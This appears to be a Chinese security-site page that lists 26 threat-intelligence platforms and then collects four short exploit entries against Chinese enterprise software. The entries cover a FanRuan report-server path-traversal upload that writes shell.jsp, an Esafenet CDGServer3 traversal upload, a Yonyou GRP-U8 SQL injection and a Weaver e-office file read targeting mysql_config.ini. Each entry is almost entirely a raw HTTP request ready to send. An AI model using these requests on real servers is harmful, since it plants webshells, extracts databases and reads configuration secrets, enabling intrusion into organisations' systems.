Quan

WEB安全 内网安全 终端对抗 威胁情报
威胁情报
26个情报相关的网址

1. 微步X 微步在线X情报社区-威胁情报查询_威胁分析平台_开放社区 
2. 安恒星图 安全星图平台
3. 奇安信 奇安信威胁情报中心
4. 情报星球 情报星球 - 安全情报交流与分享社区
5. 天际友盟RedQueen安全智能服务平台 RedQueen威胁情报中心 
6. VenusEye威胁情报中心 VenusEye威胁情报中心
7. 绿盟NTI 威胁情报中心 NTI - 威胁情报中心
8. 360威胁情报中心 360安全大脑
9. 安天威胁情报中心 https://www.antiycloud.com/
10. IBM X-Force IBM X-Force Exchange
11. VirusTotal VirusTotal
12. SANS互联网风暴中心 SANS.edu Internet Storm Center - SANS Internet Storm Center 
13. Threatcrowd 开源威胁情报 https://www.threatcrowd.org/ 
14. ThreatMiner ThreatMiner.org | Data Mining for Threat Intelligence 
15. GreyNoise GreyNoise is the source for understanding internet noise
16. CT Stack安全社区 CT Stack 安全社区
17. 腾讯安全 https://tix.qq.com/ 
18. CNTD网络安全威胁情报共享平台 CNTD网络安全威胁情报共享平台 
19. 海豚情报助手 海豚威胁情报平台
20. 先知 技术文章 - 先知社区 
21. 深信服 https://ti.sangfor.com.cn/analysis-platform
22. 鹰眼毒霸 鹰眼威胁情报 
23. 山石云瞻 Loading 
24. BadIP https://www.badip.com/
25. MISP 开源威胁情报共享平台 GitHub - MISP/MISP: MISP (core software) - Open Source Threat Intelligence Platform
26. 威胁情报管理平台 https://ti.watcherlab.com/#/search

https://www.redteam.wang
威胁情报
帆软V9文件上传

EXP
POST /seeyonreport/ReportServer?op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../WebReport/shell.jsp HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; http://www.baidu.com/search/spider.html)
Accept: */*
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
Cache-Control: no-cache
Pragma: no-cache
Host: x.x.x.x
Content-Length: 75

{"__CONTENT__": "JSPWebshell", "__CHARSET__": "UTF-8"}

https://mp.weixin.qq.com/s?__biz=MzkwOTIzODg0MA==&mid=2247490375&idx=1&sn=4e98e7835d06117e3c5e381878eda543
威胁情报
亿赛通 | DecryptApplicationService2 文件上传(附POC) 

POST /CDGServer3/DecryptApplicationService2?fileId=../../../Program+Files+(x86)/ESAFENET/CDocGuard+Server/tomcat64/webapps/CDGServer3/test.jsp HTTP/1.1
Host: xxxx
Cookie: JSESSIONID=E13D850E18BD224E56ABE1DC1D4FD13D
Cache-Control: max-age=0
Sec-Ch-Ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 5

hello

https://mp.weixin.qq.com/s?__biz=Mzg2ODg3NzExNw==&mid=2247486183&idx=1&sn=8f8c7b9838cda02b88aa1cda3f61f1e2
威胁情报
用友GRP-U8 bx_historyDataCheck.jsp SQL注入漏洞 

POST /u8qx/bx_historyDataCheck.jsp HTTP/1.1
Host: 
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=A2BF47E766B3CFCFA6BB152CC6C175B9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 12

userName=*

https://mp.weixin.qq.com/s?__biz=MzIzOTM2MzczNQ==&mid=2247483909&idx=1&sn=85d193a38c0b9c72d5220e69c8db83fa
威胁情报
泛微e-office OfficeServer2.php 存在任意文件读取漏洞复现

  泛微e-office OfficeServer2.php 存在任意文件读取漏洞隐患,攻击者可通过此漏洞获取敏感信息,为下一步攻击做准备。
iweboffice/officeserver2.php?OPTION=LOADFILE&FILENAME=../../bin/mysql_config.ini

https://mp.weixin.qq.com/s/d0qeCCZfNirROMJeKeYtSg